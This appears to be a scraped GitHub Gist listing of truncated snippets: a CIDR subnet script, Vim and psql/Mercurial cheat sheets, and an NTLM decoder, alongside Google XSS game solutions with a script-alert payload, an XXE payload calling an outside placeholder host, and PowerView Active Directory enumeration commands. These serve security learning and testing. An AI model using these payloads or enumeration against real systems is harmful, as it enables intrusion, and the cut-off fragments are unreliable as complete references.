@nboubakr
nboubakr / subnet.py
Created December 20, 2012 11:23
A simple Python script that converts a Classless Inter-Domain Routing (CIDR)-formatted IP address into an IP range and netmask.
#!/usr/bin/env python
# python subnet.py 200.100.33.65/26
import sys
# Get address string and CIDR string from command line
(addrString, cidrString) = sys.argv[1].split('/')
# Split address into octets and turn CIDR into int
addr = addrString.split('.')
@romainl
romainl / gist:9970697
Last active September 27, 2025 02:49
How to use Tim Pope's Pathogen

How to use Tim Pope’s Pathogen

I’ll assume you are on Linux or Mac OSX. For Windows, replace ~/.vim/ with $HOME\vimfiles\ and forward slashes with backward slashes.

The idea

Vim plugins can be single scripts or collections of specialized scripts that you are supposed to put in “standard” locations under your ~/.vim/ directory. Syntax scripts go into ~/.vim/syntax/, plugin scripts go into ~/.vim/plugin, documentation goes into ~/.vim/doc/ and so on. That design can lead to a messy config where it quickly becomes hard to manage your plugins.

This is not the place to explain the technicalities behind Pathogen but the basic concept is quite straightforward: each plugin lives in its own directory under ~/.vim/bundle/, where each directory simulates the standard structure of your ~/.vim/ directory.

@Kartones
Kartones / postgres-cheatsheet.md
Last active October 24, 2025 21:32
PostgreSQL command line cheatsheet

PSQL

Magic words:

psql -U postgres

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlying queries of the \ commands (cool for learning!)
  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't have a default database, like at AWS RDS)
@pbssubhash
pbssubhash / Google XSS challenge solutions..
Last active August 22, 2025 01:30
Solutions of the Google XSS Challenge..
Hey All,
I am P.B.Surya.Subhash, a 17-year-old coder, hacker and a student.
Recently I happened to see so many posts regarding this "Google XSS Challenge" and I was fortunate enough to complete them.
These are the solutions for the challenges ;)
##############################################################################
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
@staaldraad
staaldraad / XXE_payloads
Last active October 24, 2025 09:19
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@cortesben
cortesben / hg-commands.md
Last active July 1, 2025 13:48
Mercurial command cheat sheet

Mercurial Commands

| Commands | Description |
| --- | --- |
| hg pull | get latest changes like git pull use flags like -u IDK why yet |
| hg add | only for new files |
| hg commit | add changes to commit with -m for message just like git |
| hg addremove | adds new files and removes files not in your file system |
| hg incoming | see changes committed by others |
| hg outgoing | see local commits |
@aseering
aseering / ntlmdecoder.py
Last active March 12, 2025 11:27
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##
@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active May 18, 2025 13:19
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active October 4, 2025 22:33
XSS Filter Bypass List